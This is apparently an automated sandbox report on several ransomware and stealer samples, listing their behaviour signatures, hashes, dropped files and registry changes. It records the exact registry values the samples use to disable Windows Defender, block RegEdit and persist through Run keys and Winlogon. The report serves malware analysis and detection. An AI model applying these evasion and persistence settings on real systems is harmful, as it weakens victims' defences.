Malware Analysis Report

2025-05-05 21:43

Sample ID 250419-zvxnravvgs
Target https://bazaar.abuse.ch/browse.php?search=tag%3Alocker
Tags
cryptolocker credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://bazaar.abuse.ch/browse.php?search=tag%3Alocker was found to be: Known bad.

Malicious Activity Summary

cryptolocker credential_access defense_evasion discovery evasion execution impact persistence privilege_escalation ransomware spyware stealer trojan

UAC bypass

Modifies Windows Defender Real-time Protection settings

Modifies Windows Defender DisableAntiSpyware settings

CryptoLocker

Modifies WinLogon for persistence

Cryptolocker family

Deletes shadow copies

Disables RegEdit via registry modification

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Boot or Logon Autostart Execution: Active Setup

Credentials from Password Stores: Windows Credential Manager

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Drops desktop.ini file(s)

Adds Run key to start application

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Drops autorun.inf file

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Event Triggered Execution: Netsh Helper DLL

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

Runs net.exe

Scheduled Task/Job: Scheduled Task

Checks processor information in registry

System policy modification

Modifies registry class

Suspicious behavior: AddClipboardFormatListener

Opens file in notepad (likely ransom note)

Kills process with taskkill

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Modifies registry key

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Uses Volume Shadow Copy WMI provider

Modifies Internet Explorer settings

Gathers network information

MITRE ATT&CK

Enterprise Matrix V16

Analysis: static1

Detonation Overview

Reported

2025-04-19 21:02

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-04-19 21:02

Reported

2025-04-19 21:18

Platform

win10ltsc2021-20250314-en

Max time kernel

934s

Max time network

936s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker

Signatures

CryptoLocker

ransomware cryptolocker

Cryptolocker family

cryptolocker

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "1" C:\Windows\SysWOW64\reg.exe N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Boot or Logon Autostart Execution: Active Setup

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Disables RegEdit via registry modification

defense_evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\SysWOW64\reg.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description Indicator Process Target
File opened for modification \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\winlogon.exe C:\Windows\system32\taskmgr.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe N/A
N/A N/A C:\Users\Admin\Downloads\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd\66dbf939c00b09d8d22c692864b68c4a602e7a59c4b925b2e2bef57b1ad047bd.exe N/A
N/A N/A C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
N/A N/A C:\ProgramData\winlogon.exe N/A
N/A N/A C:\Windows\winlogon.exe N/A
N/A N/A C:\Users\Admin\Downloads\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9\d765e722e295969c0a5c2d90f549db8b89ab617900bf4698db41c7cdad993bb9.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\{34184A33-0407-212E-3320-09040709E2C2}.exe N/A
N/A N/A C:\Users\Admin\Downloads\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba\537a2fd4d214a212df06fb73b19ba945672eaf18d64cc30d8e99ab6a0d7cb9ba.exe N/A
N/A N/A C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
N/A N/A C:\Users\Admin\Downloads\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe N/A
N/A N/A C:\Users\Admin\Downloads\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3\a30306497eb18f549407b8e26ffeb285405433cb160a6001b8aede53e3accfd3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp1.jpg N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Local\Temp\tmp2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Tsuchigumo.bat = "C:\\Windows\\system32\\Tsuchigumo.bat" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileRescue = "C:\\ZeroLocker\\ZeroRescue.exe" C:\Users\Admin\Downloads\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa\d4c62215df74753371db33a19a69fccdc4b375c893a4b7f8b30172710fbd4cfa.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-780313508-644878201-565826771-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\firefox.exe = "C:\\Users\\Admin\\AppData\\Roaming\\Frfx\\firefox.exe" C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
